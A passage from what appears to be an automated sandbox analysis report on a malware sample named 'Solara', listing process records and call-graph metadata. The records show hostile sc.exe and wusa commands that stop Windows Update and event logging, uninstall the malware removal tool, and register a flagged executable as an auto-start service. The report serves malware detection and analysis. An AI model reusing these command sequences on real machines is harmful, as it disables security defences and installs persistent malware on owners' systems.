                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff67e9a0000
                        File size:345'088 bytes
                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:35
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:36
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:37
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:38
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:39
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:40
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:41
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:42
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:43
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop bits
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:44
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:45
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop bits
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:46
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:47
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:48
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:49
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:50
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:51
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\dialer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\dialer.exe
                        Imagebase:0x7ff74a3c0000
                        File size:39'936 bytes
                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:52
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\dialer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\dialer.exe
                        Imagebase:0x7ff74a3c0000
                        File size:39'936 bytes
                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:53
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe delete "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:54
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff6ccb00000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:55
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:56
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe delete "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:57
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:58
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:59
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:60
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:61
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\wusa.exe
                        Wow64 process (32bit):false
                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff67e9a0000
                        File size:345'088 bytes
                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:62
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:63
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:64
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:65
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:66
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\winlogon.exe
                        Wow64 process (32bit):false
                        Commandline:winlogon.exe
                        Imagebase:0x7ff6156c0000
                        File size:906'240 bytes
                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:67
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:68
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:70
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:71
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:72
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:73
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe start "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:74
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:75
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:76
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
                        Imagebase:0x7ff7f7900000
                        File size:5'468'672 bytes
                        MD5 hash:87C3DD67BFA3009D89F7B45B01D705B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 68%, ReversingLabs
                        Has exited:true

                        Target ID:77
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop bits
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:78
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:79
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:80
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe start "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:81
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:82
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true


                          Execution Graph

                          Execution Coverage:81.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:7.1%
                          Total number of Nodes:28
                          Total number of Limit Nodes:1

                          Callgraph

                          Callgraph nodes: Function_00401000, Function_00401493, Function_00401448, Function_0040108C, Function_004013EC, Function_00401509
                          Callgraph edges: Function_00401493 -> Function_00401448, Function_00401493 -> Function_0040108C, Function_00401493 -> Function_004013EC, Function_00401509 -> Function_00401493, Function_0040108C -> Function_00401000

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                          • String ID:
                          • API String ID: 3649950142-0
                          • Opcode ID: 45a2b2b421cdc0cb52dca9eaf9b06ab1bf22c399180503235e2a5d3c71e4213b
                          • Instruction ID: d9a57b5445f16cddcc865972a350975d8c1f82a2d3fe4cd121f5dbfe1fab5339
                          • Opcode Fuzzy Hash: 45a2b2b421cdc0cb52dca9eaf9b06ab1bf22c399180503235e2a5d3c71e4213b
                          • Instruction Fuzzy Hash: 541121F9E01104ABCB10EBA8EC86F5A77ECAB09308F144475F804EB355E579EA448B65

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                          • String ID: %s\%s$& @$1 @$D^:$D^:$`!@$e!@$m!@
                          • API String ID: 3236948872-1270294868
                          • Opcode ID: ce750fbac2cb14ad0dc9064ff98aa15b76953c15100595a9c4aac367c16c266a
                          • Instruction ID: 0f4fa566833f11a23764da638e14c3889644c3d1e2dc9040f1fa2ab0d00c82ab
                          • Opcode Fuzzy Hash: ce750fbac2cb14ad0dc9064ff98aa15b76953c15100595a9c4aac367c16c266a
                          • Instruction Fuzzy Hash: 94914EF0E001089BDB14DBACDC45B9E77F9EB48309F04417AF119FB391E639AA458B69

                          Control-flow Graph

                          control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                          APIs
                          Strings
                          • +._c_bha,z_&[vl/hm9(f<6>t&xw!82c, xrefs: 0040106E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: +._c_bha,z_&[vl/hm9(f<6>t&xw!82c
                          • API String ID: 2803490479-2406027873
                          • Opcode ID: 940754db854be8e9f0d654b819481c3bfaac98b721c30c9ad94932804922e4ad
                          • Instruction ID: d2f3ec46e71ac81c28e11c01a8ed58905d811356681e848a8ba007acd0030eff
                          • Opcode Fuzzy Hash: 940754db854be8e9f0d654b819481c3bfaac98b721c30c9ad94932804922e4ad
                          • Instruction Fuzzy Hash: 8F110C70A05648EFCB04CFACD4907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

                          Control-flow Graph

                          control_flow_graph 34 401493-4014e6 call 4013ec call 40108c call 401448
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: memset$ExecuteShell
                          • String ID: D`:vD`:v$D`:vD`:v
                          • API String ID: 3137921467-3916433284
                          • Opcode ID: 2406d0377fc08cd9885031446e657cb46bb0b72f9a716d35873baa4fd364bde6
                          • Instruction ID: b70dc084ebc81cf843c896ce4f36b9c1a97f1ce35968409f521680236884300f
                          • Opcode Fuzzy Hash: 2406d0377fc08cd9885031446e657cb46bb0b72f9a716d35873baa4fd364bde6
                          • Instruction Fuzzy Hash: A0F098B9A01209AFCB40DFA8D986D8E77F8AB49308F108065F948EB354D674EA448B65

                          Execution Graph

                          Execution Coverage:5.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 22056 8bf7c60 22057 8bf7ca3 SetThreadToken 22056->22057 22058 8bf7cd1 22057->22058

                          Control-flow Graph

                          control_flow_graph 486 4bfb570-4bfb589 487 4bfb58e-4bfb8d5 call 4bfad9c 486->487 488 4bfb58b 486->488 488->487
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: +Ym^$Xm^
                          • API String ID: 0-2481550747
                          • Opcode ID: 31ab029a0260ef41e31d30eb9a2aba5f01e16962008ac79392afb819279fdb21
                          • Instruction ID: a1070276fad3d228e1c4281c2403566b323a6ad2fa20814c9fd6acc7e7fa4d44
                          • Opcode Fuzzy Hash: 31ab029a0260ef41e31d30eb9a2aba5f01e16962008ac79392afb819279fdb21
                          • Instruction Fuzzy Hash: B991BF74B007149BEB19DFB48A105AF77F7EF84600B00892DD15AAB398DF74AE098BD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$JPl$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-3034988559
                          • Opcode ID: 604c3009d27c983359ad485edd813eaebfa19dbf5c6e3f5ffacb616c5654bc8a
